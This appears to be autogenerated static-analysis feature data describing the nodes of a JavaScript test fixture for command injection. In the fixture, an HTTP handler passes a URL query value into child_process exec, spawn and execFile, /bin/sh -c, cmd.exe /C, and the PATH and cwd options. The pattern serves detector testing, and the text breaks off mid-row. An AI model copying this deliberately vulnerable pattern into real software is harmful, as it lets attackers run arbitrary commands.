execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:27:29:30 | PATH | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:27:29:30 | PATH | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:27:29:35 | PATH: cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:27:29:35 | PATH: cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:27:29:35 | PATH: cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:27:29:35 | PATH: cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:27:29:35 | PATH: cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:27:29:35 | PATH: cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:27:29:35 | PATH: cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:27:29:35 | PATH: cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:27:29:35 | PATH: cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:27:29:35 | PATH: cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:33:29:35 | cmd | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:33:29:35 | cmd | InputAccessPathFromCallee | 1.env.PATH | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:33:29:35 | cmd | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:33:29:35 | cmd | assignedToPropName | PATH | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:33:29:35 | cmd | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:33:29:35 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:33:29:35 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:33:29:35 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:33:29:35 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:33:29:35 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:5:30:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:5:30:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:5:30:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:5:30:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:5:30:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:5:30:11 | cp.exec | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:5:30:11 | cp.exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:5:30:11 | cp.exec | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:5:30:11 | cp.exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:5:30:11 | cp.exec | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:5:30:30 | cp.exec ... : cmd}) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:5:30:30 | cp.exec ... : cmd}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:5:30:30 | cp.exec ... : cmd}) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:5:30:30 | cp.exec ... : cmd}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:5:30:30 | cp.exec ... : cmd}) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:5:30:30 | exceptional return of cp.exec ... : cmd}) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:5:30:30 | exceptional return of cp.exec ... : cmd}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:5:30:30 | exceptional return of cp.exec ... : cmd}) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:5:30:30 | exceptional return of cp.exec ... : cmd}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:5:30:30 | exceptional return of cp.exec ... : cmd}) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:8:30:11 | exec | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:8:30:11 | exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:8:30:11 | exec | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:8:30:11 | exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:8:30:11 | exec | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:13:30:17 | "foo" | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:13:30:17 | "foo" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:13:30:17 | "foo" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:13:30:17 | "foo" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:13:30:17 | "foo" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:13:30:17 | "foo" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:13:30:17 | "foo" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:13:30:17 | "foo" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:13:30:17 | "foo" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:20:30:29 | {cwd: cmd} | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:20:30:29 | {cwd: cmd} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:20:30:29 | {cwd: cmd} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:20:30:29 | {cwd: cmd} | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:20:30:29 | {cwd: cmd} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:20:30:29 | {cwd: cmd} | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:20:30:29 | {cwd: cmd} | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:20:30:29 | {cwd: cmd} | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:20:30:29 | {cwd: cmd} | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:21:30:23 | cwd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:21:30:23 | cwd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:21:30:23 | cwd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:21:30:23 | cwd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:21:30:23 | cwd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:21:30:28 | cwd: cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:21:30:28 | cwd: cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:21:30:28 | cwd: cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:21:30:28 | cwd: cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:21:30:28 | cwd: cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:21:30:28 | cwd: cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:21:30:28 | cwd: cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:21:30:28 | cwd: cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:21:30:28 | cwd: cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:21:30:28 | cwd: cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:26:30:28 | cmd | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:26:30:28 | cmd | InputAccessPathFromCallee | 1.cwd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:26:30:28 | cmd | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:26:30:28 | cmd | assignedToPropName | cwd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:26:30:28 | cmd | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:26:30:28 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:26:30:28 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:26:30:28 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:26:30:28 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:26:30:28 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:5:31:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:5:31:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:5:31:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:5:31:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:5:31:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:5:31:11 | cp.exec | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:5:31:11 | cp.exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:5:31:11 | cp.exec | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:5:31:11 | cp.exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:5:31:11 | cp.exec | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:5:31:30 | cp.exec ... : cmd}) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:5:31:30 | cp.exec ... : cmd}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:5:31:30 | cp.exec ... : cmd}) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - 